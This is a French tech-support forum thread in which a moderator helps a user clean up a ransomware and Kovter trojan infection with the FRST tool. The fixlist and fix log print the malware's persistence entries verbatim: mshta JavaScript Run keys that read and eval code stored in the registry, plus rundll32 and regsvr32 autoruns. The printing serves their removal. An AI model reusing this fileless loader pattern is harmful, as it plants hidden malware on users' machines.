Help svp PC infecter par cryptowall
Résolu/Fermé
hysterial
Messages postés
6
Date d'inscription
mercredi 16 décembre 2015
Statut
Membre
Dernière intervention
17 décembre 2015
-
Modifié par hysterial le 16/12/2015 à 18:03
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 20 déc. 2015 à 19:12
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 20 déc. 2015 à 19:12
A voir également:
- Help svp PC infecter par cryptowall
- Test performance pc - Guide
- Reinitialiser pc - Guide
- Pc lent - Guide
- Whatsapp pc - Télécharger - Messagerie
- Audacity enregistrer son pc - Guide
11 réponses
hysterial
Messages postés
6
Date d'inscription
mercredi 16 décembre 2015
Statut
Membre
Dernière intervention
17 décembre 2015
1
16 déc. 2015 à 19:05
16 déc. 2015 à 19:05
re-bonjour,
Voici les 3 fichiers résultant de l'analyse par FRST:
le fichier shortcut:
https://pjjoint.malekal.com/files.php?id=20151216_h15b12f13v14f13
le fichier FRST:
https://pjjoint.malekal.com/files.php?id=FRST_20151216_b15i14f8n10i7
le fichier addition:
https://pjjoint.malekal.com/files.php?id=20151216_j10v7t10r10p10
( question secondaire: les fichiers infectés jusqu'ici sont-ils les seuls à l''etre ou l'infection se propage-t-elle avec le temp? en d'autre mot doit-je faire une copie des fichier non touchés tout de suite afin que l'infection ne les infecte pas ou cela ne sert à rien?)
Que dois-je faire ensuite svp?
merci encore.
Voici les 3 fichiers résultant de l'analyse par FRST:
le fichier shortcut:
https://pjjoint.malekal.com/files.php?id=20151216_h15b12f13v14f13
le fichier FRST:
https://pjjoint.malekal.com/files.php?id=FRST_20151216_b15i14f8n10i7
le fichier addition:
https://pjjoint.malekal.com/files.php?id=20151216_j10v7t10r10p10
( question secondaire: les fichiers infectés jusqu'ici sont-ils les seuls à l''etre ou l'infection se propage-t-elle avec le temp? en d'autre mot doit-je faire une copie des fichier non touchés tout de suite afin que l'infection ne les infecte pas ou cela ne sert à rien?)
Que dois-je faire ensuite svp?
merci encore.
oui beaucoup merci beaucoup.
J'en ai profiter pour déballer mon cadeau de noel en avance du coup puisque je l'ai reçu plus tot que prévu :), un ssd...et j'ai donc formater l'ancien hdd.
Un grand merci pour tout....
J'en ai profiter pour déballer mon cadeau de noel en avance du coup puisque je l'ai reçu plus tot que prévu :), un ssd...et j'ai donc formater l'ancien hdd.
Un grand merci pour tout....
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
16 déc. 2015 à 18:05
16 déc. 2015 à 18:05
Salut,
Tu as été infecté par un Ransomware chiffreurs de fichiers.
Ces derniers vont essentiellement par des pièces jointes malicieux dans des emails ou des Exploits WEB.
Il n'y a pas vraiment de solution pour récupérer les documents.
Il faudra vérifier qu'aucun malware ne soit actif puis changer tous tes mots de passe.
Pour désinfecter l'ordinateur :
Suis ce tutoriel FRST: https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/
Télécharge et lance le scan FRST, cela va générer trois rapports FRST :
Envoie comme expliqué, ces trois rapports sur le site http://pjjoint.malekal.com et donne les trois liens pjjoint de ces rapports afin qu'ils puissent être consultés.
Tu as été infecté par un Ransomware chiffreurs de fichiers.
Ces derniers vont essentiellement par des pièces jointes malicieux dans des emails ou des Exploits WEB.
Il n'y a pas vraiment de solution pour récupérer les documents.
Il faudra vérifier qu'aucun malware ne soit actif puis changer tous tes mots de passe.
Pour désinfecter l'ordinateur :
Suis ce tutoriel FRST: https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/
Télécharge et lance le scan FRST, cela va générer trois rapports FRST :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie comme expliqué, ces trois rapports sur le site http://pjjoint.malekal.com et donne les trois liens pjjoint de ces rapports afin qu'ils puissent être consultés.
hysterial
Messages postés
6
Date d'inscription
mercredi 16 décembre 2015
Statut
Membre
Dernière intervention
17 décembre 2015
1
16 déc. 2015 à 18:21
16 déc. 2015 à 18:21
bonjour et merci pour votre aide.
Je vien donc de download FRST et de le lancer, je post les lien de fichier rapports dès que le scan est terminé.
merci beaucoup.
Je vien donc de download FRST et de le lancer, je post les lien de fichier rapports dès que le scan est terminé.
merci beaucoup.
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 660
Modifié par Malekal_morte- le 16/12/2015 à 19:21
Modifié par Malekal_morte- le 16/12/2015 à 19:21
mouaip infecté, tu sembles avoir le trojan Kovter.
Voici la correction à effectuer avec FRST.
Tu peux t'inspirer de cette note explicative avec des captures d'écran pour t'aider: https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/#fix
Ouvre le bloc-notes : Touche Windows + R, dans le champs executer, tape notepad et OK.
Copie/colle dedans ce qui suit :
HKLM-x32\...\Run: [**063af41a<*>] => mshta javascript:xzbJ7ypm=A5y1;kF92=new%20ActiveXObject(WScript.Shell);c1NhJLA=Cf3XsX;a7EGQ=kF92.RegRead(HKLM\\software\\Wow6432Node\\11bf3feae4\\1e31688d);c1rwnq7p=Pn;eval(a7EGQ);rVr3UiR=Y (l'élément de données a 6 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
HKLM\...\Policies\Explorer\Run: [**a6cc1695<*>] => mshta javascript:UpbsSO67A=GXmIJBA79;R3s=new%20ActiveXObject(WScript.Shell);gd8qnpO=s2;Bp6oN=R3s.RegRead(HKLM\\software\\Wow6432Node\\11bf3feae4\\1e31688d);EBQ2WPME=CvoM;eval(Bp6oN);WT8HveV4 (l'élément de données a 11 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\...\Run: [Ummedia] => regsvr32.exe C:\Users\mercier\AppData\Local\Ummedia\umbraSched32.dll <===== ATTENTION
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\...\Run: [**063af41a<*>] => mshta javascript:p3Ay4crJMp=B0;vL8=new%20ActiveXObject(WScript.Shell);dfdwye8bM0=yqppwnejW;z54yxt=vL8.RegRead(HKCU\\software\\11bf3feae4\\1e31688d);HAoRm9C3B=vlRoa0b;eval(z54yxt);uqErVx3e=S (l'élément de données a 6 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
C:\Users\mercier\AppData\Local\Ummedia
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.HTML [2015-12-15] ()
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.PNG [2015-12-15] ()
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.TXT [2015-12-15] ()
2015-12-15 23:55 - 2015-12-15 23:55 - 00006108 _____ C:\Users\mercier\19tcmcm0eb.mz12
2015-12-15 23:53 - 2015-12-15 23:53 - 04391276 _____ C:\Users\mercier\aq2s94s59i.jr6
2015-12-15 23:53 - 2015-12-15 23:53 - 00014380 _____ C:\Users\mercier\Downloads\4c1zjoaxu6.vmf0r
2015-12-15 23:53 - 2015-12-15 23:53 - 00007356 _____ C:\Users\mercier\d2t9ax6p.mm0
2015-12-15 23:42 - 2015-12-15 23:42 - 00013884 _____ C:\Users\mercier\Documents\9z3d0l.dk6f
2015-12-15 23:41 - 2015-12-15 23:41 - 02544876 _____ C:\Users\mercier\Documents\6h4pv2o94k.z5
2015-12-15 23:41 - 2015-12-15 23:41 - 00827744 _____ C:\Users\mercier\Documents\cbd5bk7ye.93x
2015-12-15 23:41 - 2015-12-15 23:41 - 00464540 _____ C:\Users\mercier\Documents\17k6h779.dh9mr
2015-12-15 23:41 - 2015-12-15 23:41 - 00040412 _____ C:\Users\mercier\Documents\tby6d.z3w
2015-12-15 23:41 - 2015-12-15 23:41 - 00013084 _____ C:\Users\mercier\Documents\igwkb19.4vi
2015-12-15 23:41 - 2015-12-15 23:41 - 00001500 _____ C:\Users\mercier\Documents\b9xkp.fz0w
2015-12-15 23:41 - 2015-12-15 23:41 - 00000396 _____ C:\Users\mercier\Documents\4gcxpm.5q7w
2015-12-15 23:40 - 2015-12-15 23:40 - 111829504 _____ C:\Users\mercier\Documents\holbnl6.0m5y
2015-12-15 23:40 - 2015-12-15 23:40 - 03044624 _____ C:\Users\mercier\Documents\185om1c4.6h
2015-12-15 23:40 - 2015-12-15 23:40 - 03026064 _____ C:\Users\mercier\Documents\flx7q71c8r.bh1
2015-12-15 23:40 - 2015-12-15 23:40 - 02219932 _____ C:\Users\mercier\Documents\a5trc2d.3jb
2015-12-15 23:40 - 2015-12-15 23:40 - 02219356 _____ C:\Users\mercier\Documents\xim42.x72
2015-12-15 23:40 - 2015-12-15 23:40 - 02217212 _____ C:\Users\mercier\Documents\l4s2c.7akan
2015-12-15 23:40 - 2015-12-15 23:40 - 02196716 _____ C:\Users\mercier\Documents\uu3zbfptp.2g
2015-12-15 23:40 - 2015-12-15 23:40 - 02196684 _____ C:\Users\mercier\Documents\fh4asieii.6g9be
2015-12-15 23:40 - 2015-12-15 23:40 - 02194332 _____ C:\Users\mercier\Documents\oq84x0pcl.5bg
2015-12-15 23:40 - 2015-12-15 23:40 - 02143772 _____ C:\Users\mercier\Documents\z75w48uv9j.w1p0
2015-12-15 23:40 - 2015-12-15 23:40 - 01742680 _____ C:\Users\mercier\Documents\hy84br.vu8n
2015-12-15 23:40 - 2015-12-15 23:40 - 01497860 _____ C:\Users\mercier\Documents\3jcsxll.u7df
2015-12-15 23:40 - 2015-12-15 23:40 - 01081844 _____ C:\Users\mercier\Documents\9fth9hm5.gwk4l
2015-12-15 23:40 - 2015-12-15 23:40 - 01031152 _____ C:\Users\mercier\Documents\6b6l13.4pz
2015-12-15 23:40 - 2015-12-15 23:40 - 00921952 _____ C:\Users\mercier\Documents\4b8620.rgy2
2015-12-15 23:40 - 2015-12-15 23:40 - 00844032 _____ C:\Users\mercier\Documents\7x3rm4wi.61wy
2015-12-15 23:40 - 2015-12-15 23:40 - 00368236 _____ C:\Users\mercier\Documents\8yd2ev5gx.g20pm
2015-12-15 23:40 - 2015-12-15 23:40 - 00163468 _____ C:\Users\mercier\Documents\r8657qvjt.5h
2015-12-15 23:40 - 2015-12-15 23:40 - 00136140 _____ C:\Users\mercier\Documents\imgaffd7.tug4
2015-12-15 23:40 - 2015-12-15 23:40 - 00002332 _____ C:\Users\mercier\Documents\6d46eb4mi.9y3r
2015-12-15 23:40 - 2015-12-15 23:40 - 00000908 _____ C:\Users\mercier\Documents\aa8u1.igu04
2015-12-15 23:39 - 2015-12-15 23:39 - 01191892 _____ C:\Users\mercier\Desktop\5zlh4cuqt0.s3
2015-12-15 23:39 - 2015-12-15 23:39 - 00013612 _____ C:\Users\mercier\Desktop\9wpdttvqs6.e2m2
2015-12-15 23:39 - 2015-12-15 23:39 - 00001212 _____ C:\Users\mercier\Desktop\s9xdcl4x.pow34
2015-12-15 23:39 - 2015-12-15 23:39 - 00000764 _____ C:\Users\mercier\Desktop\gdpwzok5kh.xcdt0
2015-12-15 23:39 - 2015-12-15 23:39 - 00000636 _____ C:\Users\mercier\Desktop\c64u0r1.1p
2015-12-15 23:38 - 2015-12-15 23:38 - 00010012 _____ C:\Users\mercier\Desktop\ilr78.0p0
2015-12-15 23:38 - 2015-12-15 23:38 - 00009100 _____ C:\Users\mercier\Desktop\ks1wryfn1.os5gd
2015-11-22 14:13 - 2015-11-22 14:13 - 00000010 __RSH C:\WINDOWS\jhg11971.18
Task: {0E1D3560-88FD-4B61-BFC9-3A71221AFCF5} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {2EAB552C-3284-466E-8184-F94CA34290C7} - System32\Tasks\Oyyatdhchr => Rundll32.exe "C:\WINDOWS\SysWOW64\oobe0.dll",sbxhoqjqmt
C:\WINDOWS\SysWOW64\oobe0.dll
2015-12-15 23:38 - 2015-12-15 23:38 - 0047511 _____ () C:\Users\mercier\AppData\Roaming\HELP_YOUR_FILES.PNG
2015-12-15 23:38 - 2015-12-15 23:38 - 0047537 _____ () C:\Users\mercier\AppData\Roaming\Microsoft\HELP_YOUR_FILES.PNG
2015-12-15 23:35 - 2015-12-15 23:35 - 0047738 _____ () C:\Users\mercier\AppData\Local\HELP_YOUR_FILES.PNG
Une fois, le texte collé dans le bloc-note.
Menu Fichier puis Enregistrer sous.
A gauche, place toi sur le bureau.
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.
Relance FRST et clic sur le bouton Corriger / Fix
Selon comment un redémarrage est nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur
Ensuite Ouvre Mon Ordinateur
puis le disque C
Ouvre le dossier FRST.
Dedans se trouve, le dossier Quarantine
Fais un clic droit dessus puis envoyer vers le dossier compressé.
Envoie le zip sur http://upload.malekal.com
Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
Voici la correction à effectuer avec FRST.
Tu peux t'inspirer de cette note explicative avec des captures d'écran pour t'aider: https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/#fix
Ouvre le bloc-notes : Touche Windows + R, dans le champs executer, tape notepad et OK.
Copie/colle dedans ce qui suit :
HKLM-x32\...\Run: [**063af41a<*>] => mshta javascript:xzbJ7ypm=A5y1;kF92=new%20ActiveXObject(WScript.Shell);c1NhJLA=Cf3XsX;a7EGQ=kF92.RegRead(HKLM\\software\\Wow6432Node\\11bf3feae4\\1e31688d);c1rwnq7p=Pn;eval(a7EGQ);rVr3UiR=Y (l'élément de données a 6 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
HKLM\...\Policies\Explorer\Run: [**a6cc1695<*>] => mshta javascript:UpbsSO67A=GXmIJBA79;R3s=new%20ActiveXObject(WScript.Shell);gd8qnpO=s2;Bp6oN=R3s.RegRead(HKLM\\software\\Wow6432Node\\11bf3feae4\\1e31688d);EBQ2WPME=CvoM;eval(Bp6oN);WT8HveV4 (l'élément de données a 11 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\...\Run: [Ummedia] => regsvr32.exe C:\Users\mercier\AppData\Local\Ummedia\umbraSched32.dll <===== ATTENTION
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\...\Run: [**063af41a<*>] => mshta javascript:p3Ay4crJMp=B0;vL8=new%20ActiveXObject(WScript.Shell);dfdwye8bM0=yqppwnejW;z54yxt=vL8.RegRead(HKCU\\software\\11bf3feae4\\1e31688d);HAoRm9C3B=vlRoa0b;eval(z54yxt);uqErVx3e=S (l'élément de données a 6 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
C:\Users\mercier\AppData\Local\Ummedia
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.HTML [2015-12-15] ()
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.PNG [2015-12-15] ()
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.TXT [2015-12-15] ()
2015-12-15 23:55 - 2015-12-15 23:55 - 00006108 _____ C:\Users\mercier\19tcmcm0eb.mz12
2015-12-15 23:53 - 2015-12-15 23:53 - 04391276 _____ C:\Users\mercier\aq2s94s59i.jr6
2015-12-15 23:53 - 2015-12-15 23:53 - 00014380 _____ C:\Users\mercier\Downloads\4c1zjoaxu6.vmf0r
2015-12-15 23:53 - 2015-12-15 23:53 - 00007356 _____ C:\Users\mercier\d2t9ax6p.mm0
2015-12-15 23:42 - 2015-12-15 23:42 - 00013884 _____ C:\Users\mercier\Documents\9z3d0l.dk6f
2015-12-15 23:41 - 2015-12-15 23:41 - 02544876 _____ C:\Users\mercier\Documents\6h4pv2o94k.z5
2015-12-15 23:41 - 2015-12-15 23:41 - 00827744 _____ C:\Users\mercier\Documents\cbd5bk7ye.93x
2015-12-15 23:41 - 2015-12-15 23:41 - 00464540 _____ C:\Users\mercier\Documents\17k6h779.dh9mr
2015-12-15 23:41 - 2015-12-15 23:41 - 00040412 _____ C:\Users\mercier\Documents\tby6d.z3w
2015-12-15 23:41 - 2015-12-15 23:41 - 00013084 _____ C:\Users\mercier\Documents\igwkb19.4vi
2015-12-15 23:41 - 2015-12-15 23:41 - 00001500 _____ C:\Users\mercier\Documents\b9xkp.fz0w
2015-12-15 23:41 - 2015-12-15 23:41 - 00000396 _____ C:\Users\mercier\Documents\4gcxpm.5q7w
2015-12-15 23:40 - 2015-12-15 23:40 - 111829504 _____ C:\Users\mercier\Documents\holbnl6.0m5y
2015-12-15 23:40 - 2015-12-15 23:40 - 03044624 _____ C:\Users\mercier\Documents\185om1c4.6h
2015-12-15 23:40 - 2015-12-15 23:40 - 03026064 _____ C:\Users\mercier\Documents\flx7q71c8r.bh1
2015-12-15 23:40 - 2015-12-15 23:40 - 02219932 _____ C:\Users\mercier\Documents\a5trc2d.3jb
2015-12-15 23:40 - 2015-12-15 23:40 - 02219356 _____ C:\Users\mercier\Documents\xim42.x72
2015-12-15 23:40 - 2015-12-15 23:40 - 02217212 _____ C:\Users\mercier\Documents\l4s2c.7akan
2015-12-15 23:40 - 2015-12-15 23:40 - 02196716 _____ C:\Users\mercier\Documents\uu3zbfptp.2g
2015-12-15 23:40 - 2015-12-15 23:40 - 02196684 _____ C:\Users\mercier\Documents\fh4asieii.6g9be
2015-12-15 23:40 - 2015-12-15 23:40 - 02194332 _____ C:\Users\mercier\Documents\oq84x0pcl.5bg
2015-12-15 23:40 - 2015-12-15 23:40 - 02143772 _____ C:\Users\mercier\Documents\z75w48uv9j.w1p0
2015-12-15 23:40 - 2015-12-15 23:40 - 01742680 _____ C:\Users\mercier\Documents\hy84br.vu8n
2015-12-15 23:40 - 2015-12-15 23:40 - 01497860 _____ C:\Users\mercier\Documents\3jcsxll.u7df
2015-12-15 23:40 - 2015-12-15 23:40 - 01081844 _____ C:\Users\mercier\Documents\9fth9hm5.gwk4l
2015-12-15 23:40 - 2015-12-15 23:40 - 01031152 _____ C:\Users\mercier\Documents\6b6l13.4pz
2015-12-15 23:40 - 2015-12-15 23:40 - 00921952 _____ C:\Users\mercier\Documents\4b8620.rgy2
2015-12-15 23:40 - 2015-12-15 23:40 - 00844032 _____ C:\Users\mercier\Documents\7x3rm4wi.61wy
2015-12-15 23:40 - 2015-12-15 23:40 - 00368236 _____ C:\Users\mercier\Documents\8yd2ev5gx.g20pm
2015-12-15 23:40 - 2015-12-15 23:40 - 00163468 _____ C:\Users\mercier\Documents\r8657qvjt.5h
2015-12-15 23:40 - 2015-12-15 23:40 - 00136140 _____ C:\Users\mercier\Documents\imgaffd7.tug4
2015-12-15 23:40 - 2015-12-15 23:40 - 00002332 _____ C:\Users\mercier\Documents\6d46eb4mi.9y3r
2015-12-15 23:40 - 2015-12-15 23:40 - 00000908 _____ C:\Users\mercier\Documents\aa8u1.igu04
2015-12-15 23:39 - 2015-12-15 23:39 - 01191892 _____ C:\Users\mercier\Desktop\5zlh4cuqt0.s3
2015-12-15 23:39 - 2015-12-15 23:39 - 00013612 _____ C:\Users\mercier\Desktop\9wpdttvqs6.e2m2
2015-12-15 23:39 - 2015-12-15 23:39 - 00001212 _____ C:\Users\mercier\Desktop\s9xdcl4x.pow34
2015-12-15 23:39 - 2015-12-15 23:39 - 00000764 _____ C:\Users\mercier\Desktop\gdpwzok5kh.xcdt0
2015-12-15 23:39 - 2015-12-15 23:39 - 00000636 _____ C:\Users\mercier\Desktop\c64u0r1.1p
2015-12-15 23:38 - 2015-12-15 23:38 - 00010012 _____ C:\Users\mercier\Desktop\ilr78.0p0
2015-12-15 23:38 - 2015-12-15 23:38 - 00009100 _____ C:\Users\mercier\Desktop\ks1wryfn1.os5gd
2015-11-22 14:13 - 2015-11-22 14:13 - 00000010 __RSH C:\WINDOWS\jhg11971.18
Task: {0E1D3560-88FD-4B61-BFC9-3A71221AFCF5} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {2EAB552C-3284-466E-8184-F94CA34290C7} - System32\Tasks\Oyyatdhchr => Rundll32.exe "C:\WINDOWS\SysWOW64\oobe0.dll",sbxhoqjqmt
C:\WINDOWS\SysWOW64\oobe0.dll
2015-12-15 23:38 - 2015-12-15 23:38 - 0047511 _____ () C:\Users\mercier\AppData\Roaming\HELP_YOUR_FILES.PNG
2015-12-15 23:38 - 2015-12-15 23:38 - 0047537 _____ () C:\Users\mercier\AppData\Roaming\Microsoft\HELP_YOUR_FILES.PNG
2015-12-15 23:35 - 2015-12-15 23:35 - 0047738 _____ () C:\Users\mercier\AppData\Local\HELP_YOUR_FILES.PNG
Une fois, le texte collé dans le bloc-note.
Menu Fichier puis Enregistrer sous.
A gauche, place toi sur le bureau.
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clic sur Enregistrer - cela va créer un fichier fixlist.txt sur le bureau.
Relance FRST et clic sur le bouton Corriger / Fix
Selon comment un redémarrage est nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur
Ensuite Ouvre Mon Ordinateur
puis le disque C
Ouvre le dossier FRST.
Dedans se trouve, le dossier Quarantine
Fais un clic droit dessus puis envoyer vers le dossier compressé.
Envoie le zip sur http://upload.malekal.com
Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left
hysterial
Messages postés
6
Date d'inscription
mercredi 16 décembre 2015
Statut
Membre
Dernière intervention
17 décembre 2015
1
16 déc. 2015 à 19:40
16 déc. 2015 à 19:40
re
voici donc le fichier fixlog.txt:
Résultats de correction de Farbar Recovery Scan Tool (x64) Version:16-12-2015 03
Exécuté par mercier (2015-12-16 19:35:47) Run:1
Exécuté depuis C:\Users\mercier\Desktop
Profils chargés: mercier (Profils disponibles: mercier & MSSQLSERVER)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
HKLM-x32\...\Run: [**063af41a<*>] => mshta javascript:xzbJ7ypm=A5y1;kF92=new%20ActiveXObject(WScript.Shell);c1NhJLA=Cf3XsX;a7EGQ=kF92.RegRead(HKLM\\software\\Wow6432Node\\11bf3feae4\\1e31688d);c1rwnq7p=Pn;eval(a7EGQ);rVr3UiR=Y (l'élément de données a 6 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
HKLM\...\Policies\Explorer\Run: [**a6cc1695<*>] => mshta javascript:UpbsSO67A=GXmIJBA79;R3s=new%20ActiveXObject(WScript.Shell);gd8qnpO=s2;Bp6oN=R3s.RegRead(HKLM\\software\\Wow6432Node\\11bf3feae4\\1e31688d);EBQ2WPME=CvoM;eval(Bp6oN);WT8HveV4 (l'élément de données a 11 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\...\Run: [Ummedia] => regsvr32.exe C:\Users\mercier\AppData\Local\Ummedia\umbraSched32.dll <===== ATTENTION
HKU\S-1-5-21-2500834398-3325284724-1089293236-1001\...\Run: [**063af41a<*>] => mshta javascript:p3Ay4crJMp=B0;vL8=new%20ActiveXObject(WScript.Shell);dfdwye8bM0=yqppwnejW;z54yxt=vL8.RegRead(HKCU\\software\\11bf3feae4\\1e31688d);HAoRm9C3B=vlRoa0b;eval(z54yxt);uqErVx3e=S (l'élément de données a 6 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides)
C:\Users\mercier\AppData\Local\Ummedia
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.HTML [2015-12-15] ()
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.PNG [2015-12-15] ()
Startup: C:\Users\mercier\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_YOUR_FILES.TXT [2015-12-15] ()
2015-12-15 23:55 - 2015-12-15 23:55 - 00006108 _____ C:\Users\mercier\19tcmcm0eb.mz12
2015-12-15 23:53 - 2015-12-15 23:53 - 04391276 _____ C:\Users\mercier\aq2s94s59i.jr6
2015-12-15 23:53 - 2015-12-15 23:53 - 00014380 _____ C:\Users\mercier\Downloads\4c1zjoaxu6.vmf0r
2015-12-15 23:53 - 2015-12-15 23:53 - 00007356 _____ C:\Users\mercier\d2t9ax6p.mm0
2015-12-15 23:42 - 2015-12-15 23:42 - 00013884 _____ C:\Users\mercier\Documents\9z3d0l.dk6f
2015-12-15 23:41 - 2015-12-15 23:41 - 02544876 _____ C:\Users\mercier\Documents\6h4pv2o94k.z5
2015-12-15 23:41 - 2015-12-15 23:41 - 00827744 _____ C:\Users\mercier\Documents\cbd5bk7ye.93x
2015-12-15 23:41 - 2015-12-15 23:41 - 00464540 _____ C:\Users\mercier\Documents\17k6h779.dh9mr
2015-12-15 23:41 - 2015-12-15 23:41 - 00040412 _____ C:\Users\mercier\Documents\tby6d.z3w
2015-12-15 23:41 - 2015-12-15 23:41 - 00013084 _____ C:\Users\mercier\Documents\igwkb19.4vi
2015-12-15 23:41 - 2015-12-15 23:41 - 00001500 _____ C:\Users\mercier\Documents\b9xkp.fz0w
2015-12-15 23:41 - 2015-12-15 23:41 - 00000396 _____ C:\Users\mercier\Documents\4gcxpm.5q7w
2015-12-15 23:40 - 2015-12-15 23:40 - 111829504 _____ C:\Users\mercier\Documents\holbnl6.0m5y
2015-12-15 23:40 - 2015-12-15 23:40 - 03044624 _____ C:\Users\mercier\Documents\185om1c4.6h
2015-12-15 23:40 - 2015-12-15 23:40 - 03026064 _____ C:\Users\mercier\Documents\flx7q71c8r.bh1
2015-12-15 23:40 - 2015-12-15 23:40 - 02219932 _____ C:\Users\mercier\Documents\a5trc2d.3jb
2015-12-15 23:40 - 2015-12-15 23:40 - 02219356 _____ C:\Users\mercier\Documents\xim42.x72
2015-12-15 23:40 - 2015-12-15 23:40 - 02217212 _____ C:\Users\mercier\Documents\l4s2c.7akan
2015-12-15 23:40 - 2015-12-15 23:40 - 02196716 _____ C:\Users\mercier\Documents\uu3zbfptp.2g
2015-12-15 23:40 - 2015-12-15 23:40 - 02196684 _____ C:\Users\mercier\Documents\fh4asieii.6g9be
2015-12-15 23:40 - 2015-12-15 23:40 - 02194332 _____ C:\Users\mercier\Documents\oq84x0pcl.5bg
2015-12-15 23:40 - 2015-12-15 23:40 - 02143772 _____ C:\Users\mercier\Documents\z75w48uv9j.w1p0
2015-12-15 23:40 - 2015-12-15 23:40 - 01742680 _____ C:\Users\mercier\Documents\hy84br.vu8n
2015-12-15 23:40 - 2015-12-15 23:40 - 01497860 _____ C:\Users\mercier\Documents\3jcsxll.u7df
2015-12-15 23:40 - 2015-12-15 23:40 - 01081844 _____ C:\Users\mercier\Documents\9fth9hm5.gwk4l
2015-12-15 23:40 - 2015-12-15 23:40 - 01031152 _____ C:\Users\mercier\Documents\6b6l13.4pz
2015-12-15 23:40 - 2015-12-15 23:40 - 00921952 _____ C:\Users\mercier\Documents\4b8620.rgy2
2015-12-15 23:40 - 2015-12-15 23:40 - 00844032 _____ C:\Users\mercier\Documents\7x3rm4wi.61wy
2015-12-15 23:40 - 2015-12-15 23:40 - 00368236 _____ C:\Users\mercier\Documents\8yd2ev5gx.g20pm
2015-12-15 23:40 - 2015-12-15 23:40 - 00163468 _____ C:\Users\mercier\Documents\r8657qvjt.5h
2015-12-15 23:40 - 2015-12-15 23:40 - 00136140 _____ C:\Users\mercier\Documents\imgaffd7.tug4
2015-12-15 23:40 - 2015-12-15 23:40 - 00002332 _____ C:\Users\mercier\Documents\6d46eb4mi.9y3r
2015-12-15 23:40 - 2015-12-15 23:40 - 00000908 _____ C:\Users\mercier\Documents\aa8u1.igu04
2015-12-15 23:39 - 2015-12-15 23:39 - 01191892 _____ C:\Users\mercier\Desktop\5zlh4cuqt0.s3
2015-12-15 23:39 - 2015-12-15 23:39 - 00013612 _____ C:\Users\mercier\Desktop\9wpdttvqs6.e2m2
2015-12-15 23:39 - 2015-12-15 23:39 - 00001212 _____ C:\Users\mercier\Desktop\s9xdcl4x.pow34
2015-12-15 23:39 - 2015-12-15 23:39 - 00000764 _____ C:\Users\mercier\Desktop\gdpwzok5kh.xcdt0
2015-12-15 23:39 - 2015-12-15 23:39 - 00000636 _____ C:\Users\mercier\Desktop\c64u0r1.1p
2015-12-15 23:38 - 2015-12-15 23:38 - 00010012 _____ C:\Users\mercier\Desktop\ilr78.0p0
2015-12-15 23:38 - 2015-12-15 23:38 - 00009100 _____ C:\Users\mercier\Desktop\ks1wryfn1.os5gd
2015-11-22 14:13 - 2015-11-22 14:13 - 00000010 __RSH C:\WINDOWS\jhg11971.18
Task: {0E1D3560-88FD-4B61-BFC9-3A71221AFCF5} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {2EAB552C-3284-466E-8184-F94CA34290C7} - System32\Tasks\Oyyatdhchr => Rundll32.exe "C:\WINDOWS\SysWOW64\oobe0.dll",sbxhoqjqmt
